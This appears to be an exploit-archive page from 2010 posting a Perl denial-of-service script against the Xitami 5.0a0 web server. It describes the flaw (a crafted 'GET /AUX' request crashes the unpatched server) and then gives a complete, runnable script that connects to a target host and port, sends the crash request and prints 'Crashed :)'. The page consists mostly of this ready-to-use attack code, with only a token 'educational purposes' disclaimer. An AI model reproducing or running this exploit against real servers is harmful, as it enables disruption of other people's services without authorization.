Home / os / win7

Xitami / 5.0a0 Denial Of Service

Posted on 10 May 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Xitami / 5.0a0 Denial Of Service</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>================================ Xitami / 5.0a0 Denial Of Service ================================ ########################################################################################### # # Name : Xitami/5.0a0 Denial Of Service # Author: Usman Saeed # Company: Xc0re Security Research Group # Website:http://www.xc0re.net # DATE: 10/05/10 # Tested on Windows 7 ! ########################################################################################### Disclaimer: [This code is for Educational Purposes , I would Not be responsible for any misuse of this code] [*] Download Page :http://www.xitami.com [*] Attack type : Remote [*] Patch Status : Unpatched [*] Description : By sending a crafted GET request [GET /AUX HTTP/1.0] to the server , the server crashes ! [*] Exploitation : #!/usr/bin/perl # Xitami/5.0a0 Denial Of Service # Disclaimer: # [This code is for Educational Purposes , I would Not be responsible for any misuse of this code] # Author: Usman Saeed # Company: Xc0re Security Research Group # Website: http://www.xc0re.net # DATE: [10/05/10] $host = $ARGV[0]; $PORT = $ARGV[1]; $packet = &quot;AUX&quot;; $stuff = &quot;GET /&quot;.$packet.&quot; HTTP/1.0 &quot; . use IO::Socket::INET; if (! defined $ARGV[0]) { print &quot;+========================================================+ &quot;; print &quot;+ Program [Xitami/5.0a0 Denial Of Service] + &quot;; print &quot;+ Author [Usman Saeed] + &quot;; print &quot;+ Company [Xc0re Security Research Group] + &quot;; print &quot;+ DATE: [10/05/10] + &quot;; print &quot;+ Usage :perl sploit.pl webserversip wbsvrport + &quot;; print &quot;+ Disclaimer: [This code is for Educational Purposes , + &quot;; print &quot;+ I would Not be responsible for any misuse of this code]+ &quot;; print &quot;+========================================================+ &quot;; exit; } $sock = IO::Socket::INET-&gt;new( Proto =&gt; &quot;tcp&quot;,PeerAddr =&gt; $host , PeerPort =&gt; $PORT) || die &quot;Cant connect to $host!&quot;; print &quot;+========================================================+ &quot;; print &quot;+ Program [Xitami/5.0a0 Denial Of Service] + &quot;; print &quot;+ Author [Usman Saeed] + &quot;; print &quot;+ Company [Xc0re Security Research Group] + &quot;; print &quot;+ DATE: [10/05/10] + &quot;; print &quot;+ Usage :perl sploit.pl webserversip wbsvrport + &quot;; print &quot;+ Disclaimer: [This code is for Educational Purposes , + &quot;; print &quot;+ I would Not be responsible for any misuse of this code]+ &quot;; print &quot;+========================================================+ &quot;; print &quot; &quot;; print &quot;[*] Initializing &quot;; sleep(2); print &quot;[*] Sendin DOS Packet &quot;; send ($sock , $stuff , 0); print &quot;[*] Crashed :) &quot;; $res = recv($sock,$response,1024,0); print $response; exit; Author : Usman Saeed , Xc0re Security Research Group. # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-10]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP